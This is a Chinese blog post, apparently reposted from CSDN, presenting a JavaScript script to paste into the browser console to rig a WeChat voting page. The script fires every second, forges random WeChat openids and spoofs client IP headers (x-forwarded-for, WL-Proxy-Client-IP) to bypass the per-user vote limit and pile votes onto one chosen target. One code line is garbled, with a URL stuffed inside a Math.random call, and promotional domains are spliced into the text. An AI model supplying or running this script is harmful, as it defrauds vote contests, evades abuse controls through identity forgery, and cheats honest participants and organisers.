刷票投票的自动运行脚本

刷票投票的自动运行脚本,近段有个朋友找我去写一个脚本帮他在微信刷票,我大概看了一下,其实就是根据微信的openid来限制,每个openid只能投三次票的限制。特意整理出自动刷微信投票的js代码。形成刷投票软件

1.直接电脑使用谷歌浏览器进去朋友的投票页面,f12查看页面内容

其实在页面上手动随意修改上图中openid,即可肆意不限制投票。但这样操作太麻烦了,可以看下js源码

上图可以看出,其实只要openid,和toopenid即可,openid是自己的微信id,toopenid是投票对象的微信id,那我们定时修改openid即可给某一个人刷投票

    //执行脚本
    function init(){
         initIp();
    }
    //定时操作,每秒执行一次
    function demo(){ 
    }setInterval("init()",1000);
    //随机生成以ovgMdt开头的27位微信openid(字母大小写+数字)
    function createNum(){
        var str = "ovgMdt",
                range = 21,
                arr = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];
            // 随机产生
            for(var i=0; i<range; i++){
                pos = Math.round(Math.random(http://www.aivtp.com/) * (arr.length-1));
                str += arr[pos];
            }
            return str;

    }
    //提交请求
    function initIp(){
        var ip=createIp();
        var num=createNum();
        var $toopenid='ovgMdtSysi89sfInf0pdfg5T';
        var submitData = {
                toopenid: $toopenid,
                openid: num
            };
        $.ajax({
                headers:{'x-forwarded-for':ip,'WL-Proxy-Client-IP':ip},
                type: "POST",
                url: "xxxxxxxxxxxxxx",
                data: submitData,
                dataType: "json",
                beforeSend: function () {},
                success: function (data) {
                    if (data.code == 0) {
                        $("#"+$toopenid).text(data.vote);
                        if(data.today_vote >= 2){
                            $(".vote").addClass("red");
                        }
                        $("#"+$toopenid).parent().find(".plus").css({"top":"186px","opacity":0});
                        $("#"+$toopenid).parent().find(".plus").stop().animate({"top":"176px","opacity":1},300,"swing").animate({"opacity":0},100);
                    } else {
                        alert(data.msg);
                    }
                }
        });
    }
    //生成随机的ip地址
    function createIp() {
        var a = Math.round(Math.random() * 250) + 1,
            b = Math.round(Math.random() * 250) + 1,
        c = Math.round(Math.random() * 240) + 1,
        d = Math.round(Math.random() * 240) + 1;
        return [a, b, c, d].join('.');
    }

这里生成了模拟的ip地址

把这段代码复制到浏览器F12之后的console里,直接回车即可开始刷投票wx.gam7.com(刷新或关闭浏览器即可停止刷票)

刷票的时候可以看一下network里的header,如下图

观察每个请求的ip地址和openid都是每次都切换的。

猜你喜欢

转载自blog.csdn.net/qq_43167255/article/details/82659568